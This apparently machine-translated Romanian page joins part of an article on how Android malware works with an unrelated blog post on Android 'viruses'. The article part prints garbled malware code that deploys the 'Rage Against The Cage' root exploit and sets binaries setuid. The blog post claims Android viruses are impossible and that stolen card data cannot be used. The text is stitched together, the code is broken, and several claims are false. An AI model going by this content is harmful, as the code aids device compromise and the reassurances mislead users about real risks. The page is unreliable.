Înrădăcinarea

Cine folosește:

• DroidKungFu;
• DroidDream;
• RootSmart.

Unul dintre cele mai rele lucruri care se pot întâmpla unui dispozitiv Android este să-l înrădăcineze un virus. La urma urmei, după aceasta, un program rău intenționat poate face orice cu el: instalați alți viruși, schimbați setările hardware. Această acțiune este efectuată prin lansarea secvențială a exploit-urilor:

Private void RootFunc() ( ApplicationInfo localApplicationInfo =getApplicationInfo(); /*"ratc" este o copie a faimosului exploit rădăcină Rage Against The Cage. Kiall - oprește toate procesele care rulează de aplicația curentă. Gjsvro - exploit pentru obținerea drepturilor udev ( utilizat în sistemele Linux pentru lucrul avansat cu hardware și interfețe de rețea Copiați toate acestea la locul potrivit */ Utils.copyAssets(this,"ratc","/data/data"+localApplicationInfo.packageName + "/ratc"); .copyAssets(this,"killall","/data/data"+localApplicationInfo.packageName + "/killall"); Utils.copyAssets(this,"gjsvro","/data/data"+localApplicationInfo.packageName + "/gjsvro); "); //Și rulați folosind linia de comandă Utils.oldrun ("/system/bin/chmod", "4755 /data/data"+localApplicationInfo.packageName + "/ratc"); Utils.oldrun ("/system/ bin/chmod", "4755 /data/data"+localApplicationInfo.packageName + "/killall"); Utils.oldrun ("/system/bin/chmod", "4755 /data/data"+localApplicationInfo.packageName + "/ gjsvro"); nou MyTread.start(); )

Site-uri web despre programe malware mobile

Blogul experților Kasperskiy Lab Această resursă conține articole detaliate și de înaltă calitate despre multe aspecte securitatea calculatorului, inclusiv despre virușii Android. Merită să vizitați acest site în mod regulat pentru a fi la curent cu cele mai recente evoluții.

Grupul este dedicat unui instrument open source pentru tot felul de manipulări cu codul aplicației Android (decompilarea și modificarea fișierelor DEX/ODEX/APK și așa mai departe). Androguard conține, de asemenea, o bază de date extinsă de articole despre viruși. Pe lângă asta recenzii scurte funcționalitate și metode de protecție, există analize detaliate ale codului malware.

Secțiunea Amenințări mobile la www.fortiguard.com Enciclopedia virușilor telefonici. Fiecare articol este o trecere în revistă a funcționalității, asezonată cu o cantitate semnificativă de detalii tehnice. Pe lângă informații despre amenințările la adresa sălii de operație sisteme Android, există și articole despre viruși pentru Symbian OS, iOS și alte platforme.

Protecție contra virus

Unii utilizatori cred că dacă descărcați aplicații exclusiv din Google Playși instalează un antivirus pe smartphone-ul tău, asta garantează absolut securitatea. Nu vă amăgiți: pe internet apar în mod regulat rapoarte despre găsirea de programe malware pe piața oficială. Iar numărul de programe rău intenționate nou apărute este măsurat în sute de mii pe lună, ceea ce le face dificilă intrarea în bazele de date în timp util. programe antivirus. O adevărată garanție de securitate poate veni din revizuirea manuală a codului fișierului APK înainte de a-l instala pe telefon. Nu trebuie să fii un guru în codificare pentru a identifica fragmente rău intenționate. Și articolul nostru vă va ajuta în acest sens.

Concluzie

După cum putem vedea din exemple, producția de viruși pe mobil nu este diferită în ceea ce privește complexitatea tehnologică. Desigur, aceste exemple sunt simplificate pentru a se potrivi cu formatul jurnalului - în primul rând, manipulatorii de erori și excepții sunt omiși, precum și anumite detalii tehnice, a căror absență nu vă va împiedica să înțelegeți principiile malware-ului Android, dar va protejează-te de experimente inutile. Nu sprijinim crearea de viruși, nu-i așa? 🙂

Salutare tuturor! Îmi doream de mult să scriu un articol (pentru unii aceasta va fi o știre) despre „pericolul de viruși” pentru utilizatorii sistemului de operare Android. Văd adesea comentarii de genul: „nu cumpărați Android, există o mulțime de viruși pe această axă” sau „ajuta-mă să aleg antivirus bun"etc. Acum ne vom ocupa de această problemă odată pentru totdeauna.
În primul rând, trebuie să înțelegem ceea ce se numește cuvântul „Virus” (sau formularea corectă, acesta este un computer virus). Un virus este un tip programe de calculator sau cod rău intenționat, a cărui trăsătură distinctivă este capacitatea de a se reproduce (autoreplicare). În plus, virușii pot efectua și alte acțiuni arbitrare fără știrea utilizatorului, inclusiv cele care dăunează utilizatorului și/sau computerului (descriere preluată de pe Wikipedia).

Hai să aflăm mai departe. Ce este Android? Android este deschis operarea UNIX sistem similar, pe baza Nucleul Linux. Unix-like înseamnă că toate acțiunile programelor și fișierelor (copiere, mutare, gestionare a sistemului etc.) au loc numai cu permisiunea utilizatorului. Și în al doilea rând, dacă nu aveți drepturi de superutilizator (adică root), indiferent cât de mult încercați, indiferent de tipul de eroare pe care îl setați, smartphone-ul dvs. nu va eșua niciodată sau se va închide din cauza unui fel de problemă " (cu excepția cazului în care, desigur, o uitați complet). Și faptele: astăzi există aproximativ 6 tipuri (cum ar fi linii de cod „înfricoșătoare”) care vă pot dezactiva dispozitivul. Dar ghinion, pentru ca acest lucru să se întâmple trebuie să ai un anumit model de telefon inteligent cu un anumit procesor (și sunt doar 8 dintre aceste modele și nu spun care - nu despre asta vorbesc. ..), și trebuie să modificați singur parametrii sistemului sau să instalați firmware-ul /kernel-ul cu acest „dispozitiv ucigaș”, ceea ce este de asemenea imposibil, deoarece firmware personalizat sunt întotdeauna verificate. Acum am ajuns în sfârșit la concluzia că nu numai că nu există viruși pe Android, ci sunt imposibili.

Dar (pentru a înveseli pe cei care urăsc droidii) există și alte amenințări la adresa Android. Aceștia sunt, așa cum sunt numiți, SMSsenders și spyware(cunoscut în mod popular ca troian). Să începem cu ultimele.

Spyware-ul este o sintaxă (cod) într-o aplicație normală care trimite datele utilizatorului (contacte, parole, numere de card de credit și de cont) către un server. Dar chiar și cu parola și numărul cardului de credit sau al contului, atacatorul nu vă va putea fura banii în niciun fel. Maximul sunt contactele tale și parola Odnoklassniki, de care este puțin probabil să aibă nevoie. Și din practică: am descărcat și instalat un joc piratat cu un astfel de troian. L-am văzut în timpul instalării, dar de dragul experimentului am decis să îl las, deși având root, l-am putut împiedica cu ușurință să-mi trimită datele. Există două carduri legate de telefonul meu - un card de credit și un card de economii. Dar după aproximativ jumătate de an de purtare, nu a dispărut nici un ban din conturi, pentru că... programele bancare, din fericire, au o protecție bună.

Să trecem la SMSsender și SMSsender este un cod specific în aplicația .apk, care trimite SMS-uri cu plată către server. Să încercăm să-l înțelegem mai detaliat , pe site-uri porno introducem un motor de căutare: urmărim „porno online”, mergem, iar pe al doilea site ni se cere să actualizăm FlashPlayer, care pare să fie depășit caută și descarcă pseudo-playerul nostru, care din anumite motive cântărește și 90 kb Dar pentru ca acest program să înceapă să-și facă propriul „. munca de servici", trebuie instalat. Inainte de instalare, sistemul ma avertizeaza ca aplicatia poate trimite SMS-uri platite catre alte numere de telefon si intrerup instalarea pentru ca... Ne-am dat deja seama că acesta este un smssender prost deghizat, deoarece flashplayer nu poate cântări atât de puțin și nu trebuie să trimită SMS-uri plătite. Pentru a fi complet sigur că este malware, îl dezasamblam. În ea găsesc tot ce am nevoie și chiar și numărul Yandex.Wallet, la care merg „donațiile pentru săraci”. Aș putea merge mai departe și să-l acuz, pentru că... Îl puteți găsi cu ușurință folosind Yandex.Wallet, dar nu voi face asta și nu am timp pentru asta.

Și unii pot avea o întrebare: „Îmi conectez telefonul inteligent prin USB la diferite computere. Pot „aduce infecția” de la computerul meu de serviciu pe computerul de acasă prin intermediul unui smartphone Android? Răspunsul este nu, cu excepția cazului în care îl descărcați singur virus informatic, trimite-l pe telefonul tău inteligent și apoi pe computer!
Așa că am ajuns la concluzia că instalați toate programele malware numai din cauza nepăsării și prostiei voastre. Prin urmare, aveți grijă înainte de a instala software-ul, citiți ce permisiuni necesită aplicația și totul va fi bine. Și așa cum a spus nașul meu: „Dacă ți-e frică de lupi, nu te tragi în pădure”. Vă mulțumesc tuturor pentru atenție și sper că articolul meu a fost de folos cuiva.